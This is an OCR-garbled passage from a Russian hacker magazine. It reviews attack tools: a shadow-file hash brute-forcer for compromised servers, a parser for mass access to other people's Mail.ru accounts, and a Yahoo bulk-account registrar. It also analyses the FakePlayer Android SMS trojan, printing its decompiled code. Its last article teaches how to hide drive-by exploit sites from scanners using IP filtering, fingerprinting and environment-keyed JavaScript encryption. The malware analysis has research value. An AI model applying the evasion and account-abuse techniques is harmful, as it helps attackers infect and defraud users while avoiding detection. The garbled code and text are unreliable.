компонентов (ѴѴУВІѴѴУО-редакторы, СМ5, 
форумы и т.д.]. 

3. Осуществлять поискрезервных копий фай- 
лов сайта. 

4. Строить карту сайта, описывающую его вну- 
треннюю файловую архитектуру. 

5. Анализировать контент сайта с целью 
обнаружения в нем подозрительных данных 
(например, текстов ошибок]. 

6. Проводить фаззинг-тестирование с целью 
выявления сбоев в работе веб-приложений. 

7. Многое другое (прочитатьобо всех способах 
применения комплекса ты сможешь в прила- 
гаемой документации]. 

Из особенностей данного хакерского комбайна 
можно особенно выделить его модульное по- 
строение: 

• веб-паук; 

• поисковик файлов и директорий; 
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• поисковик распространяемых компонентов; 

• поисковик резервных копий; 

• фаззер. 

Каждый из модулей реализован в виде отдель- 
ного скрипта, находящегося в директории «./ 
гип» корневой папки приложения. Все модули 
умеют взаимодействоватьдругсдругом, а 
именно использовать и дополнять результа- 
ты работы других скриптов. Общей их целью 
является составление более точной структур- 
ной карты сайта, а также сбор информации о 
встречающихся заголовках, медленных местах 
приложений, кодах ответов и многом другом. 
Просмотр итогов работы производится в от- 
дельном приложении для работы с отчетами. 
Такое разделение между графической и основ- 
ной функциональной частями сделано для 
того, чтобы последнюю можно было размещать 
на достаточно слабых системах и управлять 
ее работой с помощью командной строки. 
Основная же работа по анализу полученной 
информации осуществляется в отдельном 
приложении, которое может быть размещено, 
например, на домашнем компьютере и иметь 
в распоряжении больше ресурсов. Установка 
данного набора скриптов очень проста. Скопи- 
руй все файлы ксебе на диск и выставь права 
на запись директориям «./гезиІТз», «./Ьазез», 
«./сіаіа» и их вложенным папкам. Затем открой 
файл сопбд.іпі и заполни все параметры в сек- 
ции «бЬ». Обрати внимание на то, что если ты 
не укажешь логин и пароль, то соединение бу- 
дет происходить без запроса авторизации во- 
обще. После этого ты сразу можешь пробовать 
запускать скрипты. В случае каких-то ошибок 
они выведут соответствующее сообщение. 
Подробный видеоурок по работе с комплексом, 
а также мануалы и некоторые дополнения ты 
сможешь найти в официальном блоге группы 
Ьаск4зес, расположенном по адресу Ьаск4зес. 
ЫодзроСсот . 

Программа: ВазІѵВгиІоФгсег 
ОСТпіх 

Автор СуЬег-рипк апсі 5іто2553 




Легкий брут тб5 

Представь та кую ситуацию: ты находишь на 
похаченном сервере и тебе надо пробрутать 
определенные тб 5-хеш и или хеши из файла / 
еіс/збабоѵѵ. При этом утебя нет возможности 
или ты не хочешь использовать какие-либо 



специализированныеутилиты для брута. 
Спешу тебя обрадовать! В данной ситуации 
тебе поможет простой Ьазб-скрипт ВазЬ- 
ВгиЫогсег, который использует для процесса 
брута только стандартные возможности шелла. 
Данный сценарий настолько просто, что со- 
стоит всего лишь изтрех функций: 

1. перебор пароля кзаданному збабоѵѵ-файлу; 

2. перебор пароля по цифрам; 

3. перебор пароля по словарю. 

Основное преимущество скрипта — это работа 
со стандартными утилитами, входящими в 
основу почти любой сборки Ыпих. 
Использовать его крайне просто: 

. /тсІ5Ьги1:е. зб -ы(огб1із1:) | -п(итЬегз) | 
-і(гѵРогта1;іоп) | -Ь(ги1:е5бабоы) 
базб | збасіом 

-м - словарь (Х=7изг/збаге/сІіс1:/ 
могсіз" в скрипте) 

-п - цифры по порядку 
-Ь - брут файла збасіом 

Также существует и сишная версия данного 
скрипта, которую ты также сможешь найти на 
нашем диске. 

Автор с удовольствием выслушает твои пред- 
ложения и пожелания в то пике на Анти чате 

[ Ыиу/даЫАкд ]. 

Программ. Парсер писем 
дляМаіІ.ги 
ОС *піх/\л/іп 
Автор Рерзіз 




Конфиг парсера для МаіІ.ги 

Если ты владеешь почтовым ящиком на за- 
мечательном сервисе МаіІ.Ви.то тебе ничего 
не стоит найти в нем нужное письмо. Но что 
делать, если количествотвоих (или не совсем 
твоих :] мейлбоксов измеряется в сотнях и 
даже тысячах? Как вспомнить, в каком из 
ящиков лежит нужное письмо с регистрацией 
в твоей любимой социальной сети? На помощь 
приходит многофункциональный перловый 
скрипт под незатейливым названием «Парсер 
писем для МаіІ.ги» от мембера Античата 
Рерзіз’а. 

Особенности работы скрипта: 

• работа идет по списку аккаунтов вида: 

1о§іп@таі1 . пи : разз 
1о§іп@1із1: . ги : разз 
1о§іп@Ьк. пи : разз 
1о§іп@іпЬох. ги : разз 



• поддержка всехдоменов Мейл.Ру; 

• МНОГОПОТОЧНОСТЬ; 

• работа через веб-интерфейс почтовика; 

• отсутствие поддержки прокси. 

Возможности скрипта следующие: 

• Проверка аккаунтов на валидность. 

• Поискв почтовом ящике писем, соответ- 
ствующих определенному запросу (слову или 
фразе]. 

• Сохранение писем, найденных по опреде- 
ленному запросу. Сохранить письма можно как 
біті или текст. 

• Удаление писем, найденных по определен- 
номузапросу. 

• Поиске помощью регулярных выражений 
и сохранение определенной информации из 
писем, найденных по какому-либо запросу. 
Перед началом работы с утилитой тебе нужно 
ее сконфигурировать. Если ты не смог разо- 
браться в комментариях автора в исходнике, то 
добро пожаловать в топик ЬІЕІу/псІ'РЕІт . благо 
здесь можно найти примеры различных конфи- 
гов для различныхзадач, связанныхс работой 
парсера. 

Программа: ІК-Ю МАКЕВ 
ОС ѴУіпсІоѵѵз 2000/ХР/2003 
5егѵег/ѴІ$1а/2008 5егѵег/7 
Автор Раг$Ргод ЗоОѵѵаге 



Последним в нашем сегодняшнем обзоре вы- 
ступает реггер аккаунтов почтовика Ѵабоо. 
Особенности проги: 

• работает в полуавтоматическом режиме 
(ты должен вбивать капчу); 

• генерирует новые ящики по заданным 
параметрам; 

• отличная скорость работы; 

• возможность работы через прокси; 

• возможность выбора сервера Ѵабоо. 

Процесс работы с реггером вы глядит достаточ- 
нотривиально: 

1. Вбивай в поле Ѵабоо Ю предпочитаемое имя 
ящика (следующие прога сгенерируетсама]. 

2. В поле РаззѵѵогсІ — пароль к ящику. 

3. В рігзі: пате и баз! пате — личные да иные 
владельца аккаунта, остальные поля по 
желанию. 

4. Далее жми кнопку «5ТАВТ», вбивай капчу и 
нажимай «СВЕАТЕ». 

5. Смотри на результат работы в папке с про- 
граммой. ла 




Массовая регистрация ящиков ѴаГюо 
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МАІЛЛ/АРЕ 




АШОЮ-УБИЙЦА 

Разбираем малварь для популярной 
мобильной системы 

© Зту статью я решил посвятить разбору зловреда 
(Тгоіап-ЗМЗ.АпсІгоісІОЗ.РакеРІауег) под мобильную платформу 
Апбгоіб. Попутно я покажу все «внутренности» арк-файла 
и опишу назначение каждой из них. 



Для установки и запуска приложений под платформой АпсІгоісІ 
используются специальные файлы с расширением «арк» 
(АпсІгоісІ РасКаде). Такой файл представляет собой обычный 
2ІР-архив с определенной структурой. Вот, что получилось, 
когда я распаковал 7-2ір'ом мой Ріауег.арк (рис. 1). 

Итого, из арк-архива в корень были извлечены три файла 
и две папки. Папки называются МЕТА-ІІМР и гез, а файлы — 
АпсІ гоісі Ма піТезТ.хт I, сіаззез.сіех и гезоигсез.агзс. Эти файлы 
и папки будут присутствовать в любом арк-архиве. Давай по 
порядку пройдемся по каждому элементу только что распотро- 
шенного контейнера. 



Сіаззез.сіех 

Файл сіаззез.сіех — основной компонент арк-архива, содержащий 
код виртуальной машины Оаіѵік Ѵігіиаі МасЫпе. Стоит отме- 
тить, что несмотря на то, что программы под АпсІгоісІ пишутся на 
языке баѵа, после компиляции исходных текстов в файлы .сіазз, 
дополнительно вызывается утилита «бх», которая преобразует 
полученные скомпилированные файлы в модуль «.бех», который 
может быть исполнен вышеупомянутой виртуальной машиной. 
Таким образом, чтобы разобрать логику работы зловреда, нужно 
«копать» именно этот файл. Но к сіаззез.бех я вернусь позже, 
когда опишу остальные составляющий исходного архива. 
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Содержимое РІауег.арк 

Кезоигсез.агзс 

Этот файл представляет собой скомпилированный 
хті-конфиг, отвечающий за ресурсы. Я попро- 
бовал открыть его в Ніеѵѵ, но это мне (что логично 
:)) ничего не дало. Тогда я воспользовался бес- 
платным декомпилятором АРКТооІ [ сосіе.доодіе. 
сот/р/апсігоісі-аркіооі ). Он отлично подходит для 
преобразования бинарных хтГек в оригинальный 
вид. В результате работы этой утилиты я получил 
два файла: риЫіс.хтІ и зігіпдз.хті. Содержимое 
первого: 

<?хт1 ѵег5Іоп="1 . 0" епсосIіп§= ,, и1:-Р-8 ,, ?> 
<гезоигсе5> 

криЬІіс іуре^'сІгаіл/аЫе" пате="ісоп" 
ісІ = " 0Х7-Р020000" /> 
криЬІіс 1:уре= ,, 1ауои1:" пате="таіп" 
ісІ = " 0Х7-Р030000" /> 

криЬІіс іуре^'Бігіп^" пате="арр_пате" 
ісІ = " 0Х7Т040000" /> 

</ге5оигсез> 

РиЫіс.хтІ — контейнер, в котором расположена 
основная информация о ресурсах, используемых 
приложением. 

Существует несколько определенных типов ресур- 
сов: Апітаііоп, Соіог Эіаіе Ызр ОгаѵѵаЫе, РауоиТ 
Мепи, Эігіпд, Эіуіе и прочие. Однако в данном слу- 
чае используются только типы бгаѵѵаЫе, Іауоиі и 
зігіпд. Как можно понять из их названия, первый 
отвечает за графические объекты, второй — за 
внешний вид приложения, третий — за строковые 
данные. В файле зігіпдз.хті содержатся данные о 
строковых переменных: 

<?хт1 ѵег5Іоп="1 . 0" епсосIіп§= ,, и1:-Р-8 ,, ?> 
<гезоигсе5> 

<5І:гіп§ пате="арр_пате" >АпсІгоісІАрр1іса1:іоп1 
</з1:гіп§> 

</ге5оигсез> 

Если в файле риЫіс.хтІ вводится переменная а р р_ 
пате типа зігіпд, то в зігіпдз.хті она принимает 
вполне осмысленное значение АпсІгоібАррІісаІіопІ . 
В нашей малвари переменная арр_пате нигде 
не используется, хотя обычно на нее ссылаются в 
манифесте. Оставшаяся часть ресурсов располага- 
ется в папке гез, но к ней я вернусь после рассмо- 
трения манифеста. 



Мапііезі.хті 

Этот файл я также преобразовал в читабельный 
вид при помощи АРКТооІ. Манифест содержит в 
себе основную информацию, необходимую для 
корректного запуска и функционирования прило- 
жения: название пакета (рас ка де), название при- 
ложения, выводимое пользователю (апсігоісі :ІаЬеІ), 
название класса, который необходимо запустить 
(апбгоісЕпаппе), иконка приложения (апбгоісЫсоп) и 
т.д. А вот и сам файл: 

<?хт1 ѵег5Іоп="1 . 0" епсосIіп§= ,, и1:-Р-8 ,, ?> 
стапі-РезІ: раска§е="ог§ . те . апсігоісіарріісаіііопі" 
хтІпБ : апсІпоісІ = ,, Ы:1:р : / /зсЬетаз . апсігоісі . сот/ 
арк/гез/апсІгоісГ > 

карріісаііоп апсігоісі : ісоп^'фсІгамаЫе/ісоп" > 
касіііѵііу апсігоісі : 1аЬе1="РогпоР1ауег" 
апсігоісі : пате=" . МоѵіеР1ауег"> 

<іп1:еп1:--Рі11;ег> 

касііоп апсігоісі : пате="апсІгоісІ . 
іпіепі . асііоп .МАІІМ" /> 

ксаіе^огу апсігоісі : пате=" апсігоісі . 
іпіепі: . саіе§огу . І_АІЛ\ІСНЕК" /> 

</іп1:еп1:-іі11:ег> 

</ас1:іѵі1:у> 

к/арріісаііопх 

кизез-регтІББІоп апсігоісі : пате=" апсігоісі . 
регтІББІоп . 5ЕІ\Ю_5М5" /> 

</тапіТе5І:> 

И, напоследок, самое интересное — права, необ- 
ходимые приложению. Они содержатся в изез- 
регтіззіоп. А исследуемому зловреду, как видно из 
кода, необходимы права на отправку 5М5 (апсігоісі. 

регтІ55Іоп.5ЕІ\Ю_5М5). 

РЕ5 

Папка гез содержит непосредственно файлы ресур- 
сов. Внутри нее располагаются две папки: бгаѵѵаЫе 
и Іауоиі. Их названия совпадают с типами ресурсов, 
описанными чуть выше. Весьма ожидаемо, что в 
первой папке содержится иконка ісоп.рпд. Название 
ісоп вводилось до этого в риЫіс.хтІ. 

А во второй — содержится конфигурационный файл 
таіп.хті, отвечающий за внешний вид приложения: 

<?хт1 ѵег5Іоп="1 . 0" епсосIіп§= ,, и1:■Р-8 ,, ?> 
<І_іпеагІ_ауои1: апсігоісі югіепіаііоп^'ѵегііісаі" 
апсігоісі : ІауоиІ^іл/ісІІіЫ'ЧіІЗ^рагепІ:" 




Иконка, исполь- 
зуемая Тго|ап- 
5М5.АпсІгоісІ05. 
РакеРІауег 




Исчерпывающую ин- 
формацию по Апсігоісі 
5йК можно получить 
здесь: сіеѵеіорег. 
апсігоіб.сот/іпсіех. 
ЫпЫ. 
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МАІЛЛ/АВЕ 



Пдг і Г в е і и в і* з і о п = 1 . 13 
СгплЬшІ Бу; 1 І <Агі[Ьч] і [I > 

Чапе- і-сз/1 дѵмліі/рілм 
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Напо: йпгігоігіПдпіГеяг: і 

ЯНЙ1 В і у а г. і : Хріі /^ дш|Й 1 * , ?Й(ьНЙкЬЬ'Йхий а і ^іг; ■ 

На гти? ; гя к^ді \-лил Ь 1 в/ 1 п оп + рп у 
ЙНАІ-Відскъ: ТНггВМН ] ^ЁЛЫ еЛСВзВз^с Н Ч В1 

Мап^: і^моигеей . аеьс 

КИВІ 01^*5^: рІІ^іѴбі^ВІ^укІиЭѴі^ЙСПЕ- 

Напл: сІАВзее^ех 

ЯНАІ-ВІ Я (іяі: йг ( СПиіш44о^пШІіЬ0пАіВГ,І^КиІ - 



Фрагмент файла тапііезі.ті, который расположен 
в подпапке МЕТА-ІЫР 

апбгоіб : 1 ауои 1 :_ІпеІ 2 М 1 := 'Мп11_ра гепі: " 
хт1п5 : апбгоіб=" М1:1: р : //БсЬетаБ .апсігоісі . сот/арк/гез/ 
апсІгоісГ>" кТехіѴіем апсігоісі : ІауоиІ^іл/ібіЬ^ЧіІІ-рагепІ:" 
апсігоісі : 1ауоиі_Ьеі§Ы:= ,, ѵ\/гар_соп1:еп1:" апсігоісі :і: 
ех1:= ,, Не11о Апсігоісі -Ргогп ІМеіВеапБ" /> 

</І_іпеагІ_ауои1:> 

В этом конфигурационном файле задаются такие параметры, 
как схема расположения приложения (апсігоісііогіепіаііоп в 
І_іпеагІ_ауоіЛ), текст в объекте ТехіѴіеѵѵ ( Н е Но Апсігоісі [гот 
ЫеіВеапз) и их размеры (апбгоіб :ІауоіЛ_\л/ібІіі и а псі гоіеі :Іауоиі_ 
Ьеід Иі) . 

ЛЛЕТА-ІпТ 

В папке МЕТА-ІЫР находится сертификат приложения и кон- 
трольные суммы составных частей программы: иконки, мани- 
феста, бех-файла и т.д. 

А теперь я возвращаюсь к последнему неразобранному файлу 
— сіаззез.бех. Чтобы понять «полезную нагрузку» исследуемого 
зловреда, необходимо «вскрыть» этот контейнер. Для этих целей 
была использована бесплатная утилита бех2)аг ( собе.доодіе. 

т/р/бех2]аг ). Она на выходе выдает ]а г-фа йл , который уже 
можно разобрать без особых проблем. Стоит отметить, что поми- 
мо бех2)аг существуют и другие программы подобного назна- 
чения, например, бебехег. Также существует софт, способный 
декомпилировать Р-код виртуальной машины Оаіѵік. 

После окончания работы бех2]аг я обнаружил рядом типичный 
)аг-архив, который незамедлительно распаковал. Вот, что ока- 
залось передо мной (рис. 4). 

Каждый сіазз-файл представляет собой скомпилированный код 
на баѵа. Я воспользовался утилитой баб, чтобы всех их декомпи- 
лировать. После этого передо мной оказались восемь файлов с 
понятным кодом на баѵа, который уже можно без проблем ана- 
лизировать. 

Пять из восьми оказались неинтересными. Они работают в 
связке с конфигами ресурсов и большого интереса не пред- 
ставляют: Рд'аб, ПфаНгдаб, Р$бгаѵѵаЫедаб, Р$1ауои1щаб и 
П$з1хіпддаб. Остаются еще три. Я упоминал, что в основном 
манифесте содержится информация о стартовом классе, коим 
является МоѵіеРІауег. Следовательно, необходимо обратиться 
сразу к нему (фрагмент кода): 

риЬІіс сІазБ МоѵіеРІауег ехіепбз Асііѵііу 

{ 

риЬІіс: МоѵіеР1ауег( ) 

{ 

} 

риЬІіс ѵоіб опСгеа1:е(Випб1е Ьипбіе) 



мтикжл іп&чът.т] 

.Й Ирге - .«*! 

^ ріято , до,сгф,г^іп#кінсЬб>№пі,ме^чс^7'*і'ійіі5 

х| іЛыпі 

Д Кй-і+і 1 ^.сц-ц.ітм.^і^оНад^Ім-іІ.ЧЯлуаиІ.ііиа 

ЗІ Иаѵч* .*рМ с\»&і*€,сЬш 4+1?}* .ІМ дг^шіірріелкі-і і Я^г^.Лма 

Файлы, полученные после распаковки |аг-архива 

{ 

зирег. опСгеа1:е( Ьипбіе ) ; 

йаІіаНеІрег баіаЬеІрег = йа1:аНе1рег( іб); 
іТ(ба1:аЬе1рег . сапые( ) ) 

{ 

ТехіѴіем іехіѵіеы = пеы ТехіѴіеѵДіЬІБ) ; 

Капбот гапбот = пеы Капбот(); 
іехіѵіем. БеіТехіД 

" \и041Р\иѲ43Е\и0434\и043Е\иѲ436" 
"\и0434\и0438\и0442\и0435 . . . 
БеіСопІіепіѴіеѵДіехіѵіем) ; 

5ш5Мапа§ег 5гп5тапа§ег = 5ігі5Мапа§ег . ^еЮе-РаиІіД ) ; 
5ігіп§Виі1бег 5ігіп§Ьиі1бег = (пеы 5ігіп§Виі1бег( 
)) . аррепб(" ************"); 

І гг і = гапбот. пехііпі (0Х-Р4240) + 0х186а0; 

5ігіп§ б = 5ігіп§Ьиі1бег.аррепб(і) ,і:о5і:гіп§( ) ; 
апбгоіб . арр . Репбіп^ІпіепІ: репбіп^іпіепі: = пиіі; 
апбгоіб . арр . Репбіп^ІпіепІ: репбіп§іп1:еп1:1 = пиіі; 
5ігі5тапа§ег . 5епбТех1:Ме55а§е( "***"_, пиіі, б, 
репбіп^іпіепі:., репбіп^іпіепі:!) ; 



} 

1 іпібЬ( ) ; 

} 

} 

Код класса ОаІаНеІрег располагается в оставшихся двух фай- 
лах — ОаІаНеІрегдаб и 0а1;аНеІрег$0репНеІрегд'аб. С помощью 
этого класса зловред проверяет, запускался ли раньше он в этой 
системе или нет (Т баІабеІрег.сапѵѵеО). Выполняется это с помо- 
щью очень занятной техники. Вначале малварь пытается открыть 
или, если не получилось, создать ЗСНЛе-базу бѵѵар.бЬ. Затем он 
прочитывает данные из таблицы ІаЫеІ и если они равны строке 
«ѵѵаз», то завершается. А в противоположном случае — он запи- 
сывает туда именно эту строку и продолжает работать. 

Далее на экран выводится надпись на китайском с помощью 
ІехІѵіеѵѵ.зеіТехІ:. По-видимому, она означает что-то вроде «Идет 
загрузка...». 

Заканчивается это все составлением текста СМС из произволь- 
ных чисел (гапбот. пехіі пі) и отправкой сообщения (зтзтападег. 
зепбТехіМеззаде). Я значительно сократил исходный код. На 
самом деле отправляется несколько сообщений, но это не столь 
важно. 

Заключение 

Таким образом, наш сегодняшний мобильный зловред оказался 
очень простым — весь его полезный функционал — это отправ- 
ка короткого сообщения на премиум-номер. Разобрать же мы 
его решили по двум причинам — во-первых, он работает под 
Андроид :), который сейчас очень активно набирает обороты, и 
в маркете которого периодически проявляются, мягко говоря, 
непроверенные программки. Во-вторых, нас удивил реализо- 
ванный в нем способ проверки на предыдущий запуск приложе- 
ния. ПС 
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МАІЛ/ѴАРЕ 




ОКІѴЕ-ВУ- 

ютт 

ПО-ТИХОМУ 

Маскируем вредоносные 
сайты отѵѵераѵѵеі 
и его друзей 



©В этой статье мы поговорим об атаках Огіѵе-Ьу-Воѵ\тІоасІ. 
Напомним, что целью этих атак является распространение 
вредоносного кода, а реализуются они через привлечение жертв на 
вредоносный сайт с последующей эксплуатацией уязвимостей в ПО 
(браузер, Пазііріауег, рсііѵіеѵѵег, компоненты АсІіѵеХ и т.п.). 



Любой школьник может осуществить подобную атаку по принципу 
«сделай сам». Действительно, достаточно регистрировать домен 
где-нибудь на кокосовых островах, развернуть сайт с доступны- 
ми эксплоитами и разослать ссылку на него своим друзьяшкам в 
социальных сетях. Цинично и очень заметно. А раз так, то и время 
продуктивной работы такого сайта будет весьма и весьма непро- 
должительным: либо забанят провайдеры и регистраторы, либо сайт 
попадет в черные списки поисковых систем, либо в базы антивиру- 
сов. Достаточно логично реализовать какие-нибудь меры для прод- 
ления жизни вредоносного сайта. В этой статье мы рассмотрим, как, 
используя возможности веб-сервера и технологий НТМІ_+Ч5+С55, 
можно замаскировать поведение вредоносного сайта: наша задача 
сделать так, чтобы никто, кроме уязвимых клиентов не заподозрил 
вредоносный контент на сайте. 

Проверять результаты мы будем на сервисе с родины светозарных 
джедаев — ѵѵераѵѵеі ( ѵѵераѵѵеТсз.исзЬ.есІи/ ). для которого создателями 



были заявлены показатели обнаружения под 100%. 

Фильтрация 

Первое, что приходит в голову — сделать фильтрацию по 
ІР-адресам. В самом деле, нам абсолютно незачем выдавать экс- 
плоит по запросу от гугла или вендора, работающего в сфере 
информационной безопасности. Более того, списки нежелатель- 
ных ІР-адресов лежат в открытом доступе, и компилировать их 
с нуля нет необходимости. При поступлении запроса с адреса 
из списка можно выдавать либо обычную страницу, либо делать 
перенаправление на какой-нибудь сайт — дело вкуса. Черный 
список при желании можно расширить ІР-адресами выходных 
узлов из Тора ( Ьирз://сбеск.1:огрпэ|ес1:.огд/сді-Ьіп/ТогВи1.кЕхі1:1_І5Т 
ду) — во избежание. А еще можно запоминать ІР-адреса жертв, 
допущенных до эксплоита, и при их повторном посещении давать 
от ворот поворот (мы хотим избавиться от повышенного интереса 
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АІАХ-запрос через событие опзсгоІІ Фингерпринтинг РігеТох 4.0 и старше 



ѵ*г ЯЪ ■ І№ &КЕ . ІІЗШ1 ГІС4| ; 
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гвэи и- ♦■Зігпѵв 1 ■ ГгдаСі; * рСрйс Е г , гСсйЬ; Ш ] : 
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рпі(пяіВ); 

Шифрование с использованием ІазіМосІіЯесІ-заголовка 

пользователей, подвергшихся атаке, — пусть считают, что это 
была магия). 

В качестве дополнительной меры можно обрабатывать только 
запросы с правильно выставленным геіюггег’ом. Например, если 
мы раскидываем ссылку на вредоносный сайт по пользовате- 
лям «мордокниги», то ожидаемый нами геіюггег будет содержать 
[асебоок. 

Ріпдегргіпііпд 

Казалось бы, фильтрации по ІР-адресам достаточно. Но нет. 
Во-первых, боты зесигііу-провайдеров могут зайти через прокси- 
серверы, для которых полный список ІР-адресов ты вряд ли най- 
дешь, да и изменяться он будет очень часто. Во-вторых, в интер- 
нете полно провайдеров сервиса ОрепѴРЫ, а в-третьих, никто 
не может запретить аналитику зайти на твой сайт из дома, через 
провайдера с большим пулом глобальных адресов, раздаваемых 
динамически (например, Стрим). В качестве второго уровня про- 
тиводействия обнаружению, мы будем осуществлять обнаружение 
роботов и эмуляторов браузеров (см. ЖтПЗпТ), а также софта, на 
котором наши эксплоиты не будут работать. Этим счастливчикам 
мы тоже вернем невредоносный контент и попросим заглянуть 
через недельку. 

Первый шаг — это проверка человечности нашего клиента. На ум 
приходят использование САРТСН’и или квадратика с подписью 
«нажми на меня», или регистрация событий от мыши или кла- 
виатуры (если видим событие опплоизетоѵе и делаем вывод, что 
не робот). Первые два варианта снижают прозрачность атаки, что 
достаточно плохо. 

Определение ПО на стороне клиента в ѵѵеЬ’е — задача не новая и 
имеет несколько вариантов решения. Основная идея фингерпринтига 
— проверить особенности поддержки софтом той или иной специфи- 
кации или ее расширений: НТМІ_5, Заѵа5сгірІ, С55и т.п. Итак, мы рас- 
смотрим следующие методы фингерпринтинга: 

1. Соотнесение заголовка ІЗзег-адепІ с особенностями интерпретации 
Заѵа5сгірГа. 

2. Поддержка НТМІ_5. 

3. НТМІ_ + еѵепіз. 

4. Дополнительное ПО. 

Лучшее из этих методов мы немедленно используем в своей иннова- 
ционной деятельности. 

1. Соотнесение заголовка ІІзег-адепІ с особенностями интерпрета- 
ции ЗаѵаЗсгірГа 

Добровольно от клиента мы получаем лишь заголовок изег-адепі, 
но верить клиенту на слово мы не будем, ведь заголовок может быть 
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Вызов аІеіГ(І) через локальную СУБД 

выставлен как угодно. Более того, эмуляторы браузера обычно не 
сознаются в своей неполноценности и пытаются выдать себя за нор- 
мальный браузер. Первый шаг — определение вендора браузера. 
Традиционно вендора определяют по интерпретации специфических 
выражений на 35. 

2. Поддержка НТМІ_5 

В последнее время в интернетах холиварные споры насчет право- 
славности браузеров перешли на следующий этап: теперь все меря- 
ются поддержкой возможностей НТМБ5. Поэтому появилось множе- 
ство тематических сайтов с данными о различных версиях различных 
браузеров (например, сапіизе.сот . Ьгоѵѵзегзсоре.огд ). Мы же будем 
использовать эти данные для выявления версии браузера. 

Итак, построим простенький пример, иллюстрирующий эти два 
пункта: 

Фингерпринтинг РігеТох версии 4.0 и старше 
<зѵ§ хтІПБ : 5Ѵ§="бТТр://ммм.м3.ог§/2ѲѲѲ/5Ѵ§" 
хт1п5="біір://ммл/.іл/3.ог§/2000/5ѵ§ м ѵіемВох="0 0 200 100" 
ыісИ=И="0рх" Меі§М1:= "0рх" ісІ="іп1іпе5ѴС"> 

</5Ѵ§> 

кзсгірі: Туре="1:ех1:/даѵа5сгір1: ,, > 

ѵаг ібРР = ! ! (1*({1:о51:гіп§:0., ѵаІиеОТ: зпсііоп(х){ 

пеіигп ! ! х; }})); 

ѵа ІпІіпеБѴС = (іоситеп1:.§е1:Е1етеп1:ВуІсІ ("ІпІіпеБѴС"); 
ѵаг ібРР4 = ІбРР && (ІпІіпеБѴС != ); 

</5сгір1:> 

3. НТМІ_ + события 

Помимо интерпретации 35 и поддержки НТМБ5 мы будем прове- 
рять корректность загрузки и отображения страницы по событиям 
35. Идею того, что и как проверять, мы позаимствуем из реа- 
лизаций атаки Х55. В Х55 существует множество векторов атак 
(посмотреть их можно на Ытібзес.оі ), завязанных на события 
35, такие как опросив, опЫиг, опзсгоІІ. Зачем нам все это «слож- 
ное, еще и Х55», если на предыдущих шагах мы определили 
браузер? Ответ прост: не стоит забывать про эмуляторы! Так как 
в эмуляторе может отсутствовать, например, графический рен- 
деринг страницы (он отсутствует, например, в НТМШпТ, который 
является нашей косвенной целью), мы будем обнаруживать их 
здесь. Для этого подойдет вектор с событием опзсгоІІ с сайта 
Ытібзес. По выполнению события будем посылать АЗАХ-запрос 
на сервер для получения дальнейших указаний. 

<ЬосІу оп5сго11=такеАЗАХгедие5І:(1,еѵа1)> 

<ЬгхЬг><Ьг><ЬгхЬг> 

<ЬгхЬпхЬгхЬгхЬг> 

<ЬгхЬпхЬгхЬгхЬг> 
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ѴѴераѵѵеІ собственной перцовой 

кіприі: аиІю-Росиз /> 

</ЬосІу> 

/* функция шакеАЗАХгеяиеБіДрагат., саІІЬаск) должна быть 
описана дополнительно */ 

4. Дополнительное ПО 

В последнее время основной целью для атак стали не сами 
браузеры, а стороннее ПО, которое в них используется: НазЬ, рсіб, 
]аѵа, АсІіѵеХ, еіс. Соответственно, помимо браузера необходимо 
определять и их наличие. Посмотреть, как это делается, можно 
тут: рапорІісІіск.еІЕогд . 



КзсгірЬ Е^рс« " ЧгеіЛ/ з шісгірі ч > 

ѵаг рл - йкимпЬ.йѴ4Іиіи | Ѵ/1і' і ййгшллЬ, к.и11 + 
ХРйЙіЙйіи1Г .Аіга_ТІ?Ер ыш 
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ЁК/«Г*р*> 

Доступ к <р>-тэгам через ХраІІі 




Обфусцируем ^аѵа5с^ірі с помощью Цепсосіе 

Пример: 

ѵаі Типе = еѵаі; 

■Рипс("а1ег1:(1) "); 



Больше эксплоитов — больше „ 
«осчастливленных» пользователей 

В качестве последнего улучшения попытаемся повысить эффек- 
тивность атаки путем размещения нескольких эксплоитов. Для 
этого будем передавать данные фингерпринтинга на сервер, а 
сервер на основе этих данных будет возвращать редирект на 
страницу с эксплоитом, подходящим под конфигурацию. 

Обфускация 

Обфускация кода — задача такая же не новая, как и фингер- 
принтинг ПО. Для баѵаЗсгірГа существуют готовые решения, 
такие какдепсобе ( иІІ-8.щ/риЬисД]епсобе.Ьі:пп[ 1. Можно было бы 
ограничиться этим, но мы попытаемся создать дополнительные 
трудности тем, кто захочет изучить наши скрипты. Нашей целью 
будет не столько обфусцировать код, сколько сделать невоз- 
можным его повторный запуск в других условиях. Для этого код 
мы будем шифровать, но шифровать не просто так, а с ключом, 
который зависит от окружения. Например, можно использовать 
значения заголовков НТТР, кукисов, даты и времени и их комби- 
наций. Например: 

Шифрование с использованием ЬаБІМобібеб -заголовка 

кзегірі: 1:уре="1:ех1:/заѵа5спір1: ,, > 

ѵаг 61: = пем Оа1:е(боситеп1: ЛазІіМобіІіеб); 

ѵаг 5І:г = >"; //ХОРНесІ "а1ег1:(1) ; " и/і/Ыі кеу 5; 

ѵаі кеу = б1:.§е1:Ноиг5() % 8; 

ѵа гезіііі: 

■Рог(і=Ѳ;і<5І:г.1еп§1:Іі;++і) 

{ 

гезиіі: +=51:гіп§.-РпотСІіагСобе(кеу л 5І:г. сбагСобеА1:(і)); 

} 

еѵа1(ге5и11:); 

</зсгір1:> 

Кроме того, если совместить обфускацию с фингерпринтингом, то 
в качестве составляющей ключа можно использовать фингерпринт 
целевой конфигурации ПО пользователя. В качестве небольшого 
бонуса к этому можно использовать следующие приемы: 

1. Переопределение функций и констант. 



2. Использование Храбэ в баѵаЗсгірС 
Пример: 

Доступ к <р>-тэгам через Храѣіі 

кзегірі: 1:уре= ,, 1:ех1:/]аѵа5сгір1: ,, > 
ѵаг рапа§парІі5 = боситепІі.еѵаІиаІіеОѴ/р'Д 
боситеп-Щ пиГ , 

ХРа*ИКе5и11:.АМУ_ТУРЕ, пиіі 

); 

</5Сгір1:> 

3. В НТМИ5 появился такой объект, как локальная СУБД. 

Нам это поможет тем, что результат, полученный 5ЕІ_ЕСТ- 
запросом, можно передавать в функцию — например, в еѵаі. 
Соответственно, код, который мы хотим исполнить, можно 
обфусцировать средствами 50Е. Также, если браузер под- 
держивает Естазсгірі Іог ХМБ, можно использовать ХМБ- 
выражения: 

Вызов а1ег1:(1) через локальную СУБД 

<5сгір1: 1уре= , Чех'Ь/ іаѵаБегір'Ь" > 

ореп0а1:аЬа5е( ' Д 1,1,0) .1:гап5ас1:іоп(-Рипс1:іоп($){ 

$.ехеси1:е5ц1( 'БЕЬЕСТ "аі" || "ег" || '4(1)"', [], 

■Гипс1:іоп($., пе5и11:5){ 
